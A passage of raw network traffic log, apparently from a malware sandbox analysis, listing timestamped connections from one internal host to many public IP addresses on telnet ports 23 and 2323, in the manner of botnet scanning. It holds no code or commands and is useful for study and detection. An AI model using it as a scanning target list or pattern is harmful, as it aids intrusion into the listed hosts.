                                                                  Nov 28, 2024 07:28:07.893838882 CET3920423192.168.2.2327.77.187.123
                                                                  Nov 28, 2024 07:28:07.894316912 CET329942323192.168.2.2382.181.172.117
                                                                  Nov 28, 2024 07:28:07.894831896 CET5400423192.168.2.23141.30.8.114
                                                                  Nov 28, 2024 07:28:07.895291090 CET4204423192.168.2.2373.86.87.95
                                                                  Nov 28, 2024 07:28:07.895742893 CET3483423192.168.2.23210.187.219.38
                                                                  Nov 28, 2024 07:28:07.896223068 CET4569023192.168.2.2375.217.181.0
                                                                  Nov 28, 2024 07:28:07.896678925 CET5136623192.168.2.2367.69.44.33
                                                                  Nov 28, 2024 07:28:07.897151947 CET3982423192.168.2.23160.29.196.109
                                                                  Nov 28, 2024 07:28:07.897634029 CET3319623192.168.2.2363.89.75.233
                                                                  Nov 28, 2024 07:28:07.898200035 CET4008823192.168.2.2387.85.47.174
                                                                  Nov 28, 2024 07:28:07.898559093 CET4071223192.168.2.23211.240.199.148
                                                                  Nov 28, 2024 07:28:07.899023056 CET453302323192.168.2.23166.95.100.85
                                                                  Nov 28, 2024 07:28:07.899557114 CET3791423192.168.2.23133.246.190.19
                                                                  Nov 28, 2024 07:28:07.900047064 CET5951423192.168.2.23167.222.7.214
                                                                  Nov 28, 2024 07:28:07.900509119 CET3779023192.168.2.235.132.15.191
                                                                  Nov 28, 2024 07:28:07.900985003 CET4406823192.168.2.23175.34.246.191
                                                                  Nov 28, 2024 07:28:07.901448011 CET3852423192.168.2.2366.216.115.45
                                                                  Nov 28, 2024 07:28:07.901899099 CET3394423192.168.2.23205.229.30.1
                                                                  Nov 28, 2024 07:28:07.902344942 CET4191823192.168.2.23209.196.175.226
                                                                  Nov 28, 2024 07:28:07.902798891 CET5822823192.168.2.23220.82.128.39
                                                                  Nov 28, 2024 07:28:07.903270960 CET5307823192.168.2.2376.222.60.237
                                                                  Nov 28, 2024 07:28:07.903737068 CET336082323192.168.2.232.216.2.46
                                                                  Nov 28, 2024 07:28:07.904220104 CET5933823192.168.2.2346.107.33.156
                                                                  Nov 28, 2024 07:28:07.904694080 CET5288223192.168.2.23142.89.234.92
                                                                  Nov 28, 2024 07:28:07.905152082 CET5190623192.168.2.23153.17.65.19
                                                                  Nov 28, 2024 07:28:07.905607939 CET5693423192.168.2.2347.92.183.192
                                                                  Nov 28, 2024 07:28:07.906084061 CET4069023192.168.2.2379.175.253.107
                                                                  Nov 28, 2024 07:28:07.906543970 CET3499023192.168.2.234.101.232.99
                                                                  Nov 28, 2024 07:28:07.906984091 CET5292623192.168.2.23202.43.94.98
                                                                  Nov 28, 2024 07:28:07.907426119 CET4349223192.168.2.2327.217.235.147
                                                                  Nov 28, 2024 07:28:07.907902956 CET5985023192.168.2.2314.248.165.45
                                                                  Nov 28, 2024 07:28:07.908349037 CET3659023192.168.2.23195.8.52.25
                                                                  Nov 28, 2024 07:28:07.908768892 CET4824423192.168.2.23220.29.73.165
                                                                  Nov 28, 2024 07:28:07.909293890 CET4929423192.168.2.2334.147.100.152
                                                                  Nov 28, 2024 07:28:07.909797907 CET4811423192.168.2.232.8.223.200
                                                                  Nov 28, 2024 07:28:07.910341024 CET4860623192.168.2.23121.169.193.42
                                                                  Nov 28, 2024 07:28:07.910845995 CET5010223192.168.2.23217.192.192.149
                                                                  Nov 28, 2024 07:28:07.911393881 CET4916023192.168.2.2375.20.85.34
                                                                  Nov 28, 2024 07:28:07.911906004 CET354762323192.168.2.2338.244.192.242
                                                                  Nov 28, 2024 07:28:07.912416935 CET5264623192.168.2.2339.202.220.45
                                                                  Nov 28, 2024 07:28:07.912949085 CET5373823192.168.2.2397.129.90.195
                                                                  Nov 28, 2024 07:28:07.913479090 CET470422323192.168.2.23159.207.88.183
                                                                  Nov 28, 2024 07:28:07.913996935 CET4818023192.168.2.2398.126.106.61
                                                                  Nov 28, 2024 07:28:07.914499044 CET5000223192.168.2.2346.124.220.228
                                                                  Nov 28, 2024 07:28:07.915014982 CET3411023192.168.2.23184.80.121.61
                                                                  Nov 28, 2024 07:28:07.915544033 CET4836423192.168.2.23154.33.109.236
                                                                  Nov 28, 2024 07:28:07.916060925 CET4012423192.168.2.23217.107.86.197
                                                                  Nov 28, 2024 07:28:07.916584015 CET3929623192.168.2.23110.51.128.111
                                                                  Nov 28, 2024 07:28:07.917098045 CET4147223192.168.2.2339.13.14.185
                                                                  Nov 28, 2024 07:28:07.917805910 CET4818223192.168.2.23133.124.4.125
                                                                  Nov 28, 2024 07:28:07.918143034 CET462122323192.168.2.23160.126.89.203
                                                                  Nov 28, 2024 07:28:07.918663979 CET5500023192.168.2.23154.1.80.91
                                                                  Nov 28, 2024 07:28:07.919194937 CET3674423192.168.2.23163.84.192.29
                                                                  Nov 28, 2024 07:28:07.919734955 CET5940423192.168.2.2327.200.148.160
                                                                  Nov 28, 2024 07:28:07.920510054 CET3641223192.168.2.2340.0.225.231
                                                                  Nov 28, 2024 07:28:07.921142101 CET3735223192.168.2.2317.45.131.71
                                                                  Nov 28, 2024 07:28:07.921675920 CET5698023192.168.2.23168.12.214.75
                                                                  Nov 28, 2024 07:28:07.922194004 CET4673223192.168.2.23108.202.204.126
                                                                  Nov 28, 2024 07:28:07.922714949 CET4636623192.168.2.2312.58.99.250
                                                                  Nov 28, 2024 07:28:07.923240900 CET5617023192.168.2.23193.97.171.146
                                                                  Nov 28, 2024 07:28:07.923772097 CET519602323192.168.2.2378.219.117.109
                                                                  Nov 28, 2024 07:28:07.924276114 CET5726823192.168.2.23117.136.206.216
                                                                  Nov 28, 2024 07:28:07.924779892 CET5349223192.168.2.2391.8.37.46
                                                                  Nov 28, 2024 07:28:07.941286087 CET3606823192.168.2.23111.61.93.7
                                                                  Nov 28, 2024 07:28:07.941878080 CET529221023192.168.2.23114.175.171.99
                                                                  Nov 28, 2024 07:28:07.942605019 CET4240223192.168.2.23187.45.135.192
                                                                  Nov 28, 2024 07:28:07.970588923 CET10234117024.182.99.32192.168.2.23
                                                                  Nov 28, 2024 07:28:07.970719099 CET411701023192.168.2.2324.182.99.32
                                                                  Nov 28, 2024 07:28:07.971360922 CET234957099.74.108.169192.168.2.23
                                                                  Nov 28, 2024 07:28:07.971409082 CET4957023192.168.2.2399.74.108.169
                                                                  Nov 28, 2024 07:28:07.972147942 CET234479673.219.239.35192.168.2.23
                                                                  Nov 28, 2024 07:28:07.972309113 CET4479623192.168.2.2373.219.239.35
                                                                  Nov 28, 2024 07:28:07.972443104 CET2347690205.120.161.230192.168.2.23
                                                                  Nov 28, 2024 07:28:07.972481966 CET4769023192.168.2.23205.120.161.230
                                                                  Nov 28, 2024 07:28:07.972902060 CET234322892.186.90.104192.168.2.23
                                                                  Nov 28, 2024 07:28:07.972934961 CET4322823192.168.2.2392.186.90.104
                                                                  Nov 28, 2024 07:28:07.973994970 CET233623612.45.201.69192.168.2.23
                                                                  Nov 28, 2024 07:28:07.974036932 CET3623623192.168.2.2312.45.201.69
                                                                  Nov 28, 2024 07:28:07.974478960 CET235811668.175.168.187192.168.2.23
                                                                  Nov 28, 2024 07:28:07.974536896 CET5811623192.168.2.2368.175.168.187
                                                                  Nov 28, 2024 07:28:07.975039959 CET2359876218.71.66.230192.168.2.23
                                                                  Nov 28, 2024 07:28:07.975334883 CET5987623192.168.2.23218.71.66.230
                                                                  Nov 28, 2024 07:28:07.975723028 CET235883266.193.238.42192.168.2.23
                                                                  Nov 28, 2024 07:28:07.976133108 CET2336642177.153.224.108192.168.2.23
                                                                  Nov 28, 2024 07:28:07.976167917 CET3664223192.168.2.23177.153.224.108
                                                                  Nov 28, 2024 07:28:07.976336002 CET5883223192.168.2.2366.193.238.42
                                                                  Nov 28, 2024 07:28:07.977699041 CET232347372149.189.137.118192.168.2.23
                                                                  Nov 28, 2024 07:28:07.977730989 CET2346702180.141.156.108192.168.2.23
                                                                  Nov 28, 2024 07:28:07.977768898 CET4670223192.168.2.23180.141.156.108
                                                                  Nov 28, 2024 07:28:07.977777958 CET235140238.63.63.241192.168.2.23
                                                                  Nov 28, 2024 07:28:07.977824926 CET5140223192.168.2.2338.63.63.241
                                                                  Nov 28, 2024 07:28:07.978434086 CET233608490.234.228.45192.168.2.23
                                                                  Nov 28, 2024 07:28:07.978477001 CET473722323192.168.2.23149.189.137.118
                                                                  Nov 28, 2024 07:28:07.978477001 CET3608423192.168.2.2390.234.228.45
                                                                  Nov 28, 2024 07:28:07.978846073 CET2347838159.213.161.229192.168.2.23
                                                                  Nov 28, 2024 07:28:07.978882074 CET4783823192.168.2.23159.213.161.229
                                                                  Nov 28, 2024 07:28:07.979392052 CET235456612.214.45.54192.168.2.23
                                                                  Nov 28, 2024 07:28:07.979430914 CET5456623192.168.2.2312.214.45.54
                                                                  Nov 28, 2024 07:28:07.979968071 CET2359506203.222.174.107192.168.2.23
                                                                  Nov 28, 2024 07:28:07.980084896 CET5950623192.168.2.23203.222.174.107
                                                                  Nov 28, 2024 07:28:07.980447054 CET2358484178.99.194.70192.168.2.23
                                                                  Nov 28, 2024 07:28:07.980485916 CET5848423192.168.2.23178.99.194.70
                                                                  Nov 28, 2024 07:28:07.980930090 CET2341750193.136.3.1192.168.2.23
                                                                  Nov 28, 2024 07:28:07.980984926 CET4175023192.168.2.23193.136.3.1
                                                                  Nov 28, 2024 07:28:07.981494904 CET233911818.117.113.208192.168.2.23
                                                                  Nov 28, 2024 07:28:07.981540918 CET3911823192.168.2.2318.117.113.208
                                                                  Nov 28, 2024 07:28:07.982023001 CET2350494163.147.219.173192.168.2.23
                                                                  Nov 28, 2024 07:28:07.982063055 CET5049423192.168.2.23163.147.219.173
                                                                  Nov 28, 2024 07:28:07.982683897 CET2356204135.221.122.200192.168.2.23
                                                                  Nov 28, 2024 07:28:07.982733011 CET5620423192.168.2.23135.221.122.200
                                                                  Nov 28, 2024 07:28:07.983371973 CET235745686.59.37.240192.168.2.23
                                                                  Nov 28, 2024 07:28:07.983944893 CET2354840210.2.49.78192.168.2.23
                                                                  Nov 28, 2024 07:28:07.983992100 CET5484023192.168.2.23210.2.49.78
                                                                  Nov 28, 2024 07:28:07.984601974 CET233419472.180.145.164192.168.2.23
                                                                  Nov 28, 2024 07:28:07.984649897 CET3419423192.168.2.2372.180.145.164
                                                                  Nov 28, 2024 07:28:07.984883070 CET5745623192.168.2.2386.59.37.240
                                                                  Nov 28, 2024 07:28:07.984967947 CET2356864202.105.120.10192.168.2.23
                                                                  Nov 28, 2024 07:28:07.985007048 CET5686423192.168.2.23202.105.120.10
                                                                  Nov 28, 2024 07:28:07.985521078 CET23234447412.64.101.250192.168.2.23
                                                                  Nov 28, 2024 07:28:07.985560894 CET444742323192.168.2.2312.64.101.250
                                                                  Nov 28, 2024 07:28:07.985908985 CET2333410177.20.13.63192.168.2.23
                                                                  Nov 28, 2024 07:28:07.985951900 CET3341023192.168.2.23177.20.13.63
                                                                  Nov 28, 2024 07:28:07.986342907 CET233835453.214.94.19192.168.2.23
                                                                  Nov 28, 2024 07:28:07.986382961 CET3835423192.168.2.2353.214.94.19
                                                                  Nov 28, 2024 07:28:07.986816883 CET2344680147.73.187.185192.168.2.23
                                                                  Nov 28, 2024 07:28:07.986861944 CET4468023192.168.2.23147.73.187.185
                                                                  Nov 28, 2024 07:28:07.987279892 CET232347946176.2.237.115192.168.2.23
                                                                  Nov 28, 2024 07:28:07.987324953 CET479462323192.168.2.23176.2.237.115
                                                                  Nov 28, 2024 07:28:07.987698078 CET234616690.246.154.236192.168.2.23
                                                                  Nov 28, 2024 07:28:07.987729073 CET4616623192.168.2.2390.246.154.236
                                                                  Nov 28, 2024 07:28:07.988118887 CET2360816133.161.229.165192.168.2.23
                                                                  Nov 28, 2024 07:28:07.988149881 CET6081623192.168.2.23133.161.229.165
                                                                  Nov 28, 2024 07:28:07.988622904 CET2342722212.165.227.239192.168.2.23
                                                                  Nov 28, 2024 07:28:07.988662004 CET4272223192.168.2.23212.165.227.239
                                                                  Nov 28, 2024 07:28:07.989068985 CET233492014.15.29.196192.168.2.23
                                                                  Nov 28, 2024 07:28:07.989105940 CET3492023192.168.2.2314.15.29.196
                                                                  Nov 28, 2024 07:28:07.989581108 CET233619068.98.16.71192.168.2.23
                                                                  Nov 28, 2024 07:28:07.989634037 CET3619023192.168.2.2368.98.16.71
                                                                  Nov 28, 2024 07:28:07.989962101 CET234359695.167.222.187192.168.2.23
                                                                  Nov 28, 2024 07:28:07.990004063 CET4359623192.168.2.2395.167.222.187
                                                                  Nov 28, 2024 07:28:07.990406036 CET233529237.4.224.95192.168.2.23
                                                                  Nov 28, 2024 07:28:07.990442038 CET3529223192.168.2.2337.4.224.95
                                                                  Nov 28, 2024 07:28:07.991231918 CET2354184183.232.188.146192.168.2.23
                                                                  Nov 28, 2024 07:28:07.991267920 CET5418423192.168.2.23183.232.188.146
                                                                  Nov 28, 2024 07:28:07.991894960 CET2355722216.136.62.214192.168.2.23
                                                                  Nov 28, 2024 07:28:07.992377043 CET232354326118.88.159.199192.168.2.23
                                                                  Nov 28, 2024 07:28:07.992408037 CET543262323192.168.2.23118.88.159.199
                                                                  Nov 28, 2024 07:28:07.992805958 CET5572223192.168.2.23216.136.62.214
                                                                  Nov 28, 2024 07:28:07.992917061 CET2345122174.250.154.215192.168.2.23
                                                                  Nov 28, 2024 07:28:07.992960930 CET4512223192.168.2.23174.250.154.215
                                                                  Nov 28, 2024 07:28:07.993329048 CET2350636183.120.2.205192.168.2.23
                                                                  Nov 28, 2024 07:28:07.993366003 CET5063623192.168.2.23183.120.2.205
                                                                  Nov 28, 2024 07:28:07.993794918 CET2352450196.241.107.177192.168.2.23
                                                                  Nov 28, 2024 07:28:07.994204044 CET2360486152.227.159.35192.168.2.23
                                                                  Nov 28, 2024 07:28:07.994237900 CET6048623192.168.2.23152.227.159.35
                                                                  Nov 28, 2024 07:28:07.994698048 CET2338640155.147.88.109192.168.2.23
                                                                  Nov 28, 2024 07:28:07.994740009 CET3864023192.168.2.23155.147.88.109
                                                                  Nov 28, 2024 07:28:07.995101929 CET234570046.117.145.123192.168.2.23
                                                                  Nov 28, 2024 07:28:07.995138884 CET4570023192.168.2.2346.117.145.123
                                                                  Nov 28, 2024 07:28:07.995635033 CET233571283.130.14.204192.168.2.23
                                                                  Nov 28, 2024 07:28:07.996037960 CET2356174151.193.210.237192.168.2.23
                                                                  Nov 28, 2024 07:28:07.996072054 CET5617423192.168.2.23151.193.210.237
                                                                  Nov 28, 2024 07:28:07.996462107 CET234055242.219.97.40192.168.2.23
                                                                  Nov 28, 2024 07:28:07.996505022 CET5245023192.168.2.23196.241.107.177
                                                                  Nov 28, 2024 07:28:07.996505022 CET3571223192.168.2.2383.130.14.204
                                                                  Nov 28, 2024 07:28:07.996505022 CET4055223192.168.2.2342.219.97.40
                                                                  Nov 28, 2024 07:28:07.996964931 CET2351976148.13.114.1192.168.2.23
                                                                  Nov 28, 2024 07:28:07.996995926 CET5197623192.168.2.23148.13.114.1
                                                                  Nov 28, 2024 07:28:07.997510910 CET232353000153.128.236.153192.168.2.23
                                                                  Nov 28, 2024 07:28:07.997545004 CET530002323192.168.2.23153.128.236.153
                                                                  Nov 28, 2024 07:28:07.998003006 CET2360616142.169.32.17192.168.2.23
                                                                  Nov 28, 2024 07:28:07.998060942 CET6061623192.168.2.23142.169.32.17
                                                                  Nov 28, 2024 07:28:07.998364925 CET2345244125.200.70.208192.168.2.23
                                                                  Nov 28, 2024 07:28:07.998399019 CET4524423192.168.2.23125.200.70.208
                                                                  Nov 28, 2024 07:28:07.998823881 CET235393858.23.211.28192.168.2.23
                                                                  Nov 28, 2024 07:28:07.998857021 CET5393823192.168.2.2358.23.211.28
                                                                  Nov 28, 2024 07:28:07.999301910 CET234020447.219.241.21192.168.2.23
                                                                  Nov 28, 2024 07:28:07.999336958 CET4020423192.168.2.2347.219.241.21
                                                                  Nov 28, 2024 07:28:07.999798059 CET234922440.158.129.228192.168.2.23
                                                                  Nov 28, 2024 07:28:07.999840021 CET4922423192.168.2.2340.158.129.228
                                                                  Nov 28, 2024 07:28:08.000344992 CET2349452152.217.64.215192.168.2.23
                                                                  Nov 28, 2024 07:28:08.000380039 CET4945223192.168.2.23152.217.64.215
                                                                  Nov 28, 2024 07:28:08.013283968 CET2340288182.148.173.60192.168.2.23
                                                                  Nov 28, 2024 07:28:08.013345957 CET4028823192.168.2.23182.148.173.60
                                                                  Nov 28, 2024 07:28:08.013644934 CET233920427.77.187.123192.168.2.23
                                                                  Nov 28, 2024 07:28:08.013787985 CET3920423192.168.2.2327.77.187.123
                                                                  Nov 28, 2024 07:28:08.014146090 CET23233299482.181.172.117192.168.2.23
                                                                  Nov 28, 2024 07:28:08.014180899 CET329942323192.168.2.2382.181.172.117
                                                                  Nov 28, 2024 07:28:08.014708996 CET2354004141.30.8.114192.168.2.23
                                                                  Nov 28, 2024 07:28:08.014745951 CET5400423192.168.2.23141.30.8.114
                                                                  Nov 28, 2024 07:28:08.015111923 CET234204473.86.87.95192.168.2.23
                                                                  Nov 28, 2024 07:28:08.015151978 CET4204423192.168.2.2373.86.87.95
                                                                  Nov 28, 2024 07:28:08.015628099 CET2334834210.187.219.38192.168.2.23
                                                                  Nov 28, 2024 07:28:08.015662909 CET3483423192.168.2.23210.187.219.38
                                                                  Nov 28, 2024 07:28:08.016048908 CET234569075.217.181.0192.168.2.23
                                                                  Nov 28, 2024 07:28:08.016083002 CET4569023192.168.2.2375.217.181.0
                                                                  Nov 28, 2024 07:28:08.016536951 CET235136667.69.44.33192.168.2.23
                                                                  Nov 28, 2024 07:28:08.016597033 CET5136623192.168.2.2367.69.44.33
                                                                  Nov 28, 2024 07:28:08.016974926 CET2339824160.29.196.109192.168.2.23
                                                                  Nov 28, 2024 07:28:08.017010927 CET3982423192.168.2.23160.29.196.109
                                                                  Nov 28, 2024 07:28:08.017604113 CET233319663.89.75.233192.168.2.23
                                                                  Nov 28, 2024 07:28:08.017647982 CET3319623192.168.2.2363.89.75.233
                                                                  Nov 28, 2024 07:28:08.018132925 CET234008887.85.47.174192.168.2.23
                                                                  Nov 28, 2024 07:28:08.018388987 CET2340712211.240.199.148192.168.2.23
                                                                  Nov 28, 2024 07:28:08.018423080 CET4071223192.168.2.23211.240.199.148
                                                                  Nov 28, 2024 07:28:08.018850088 CET232345330166.95.100.85192.168.2.23
                                                                  Nov 28, 2024 07:28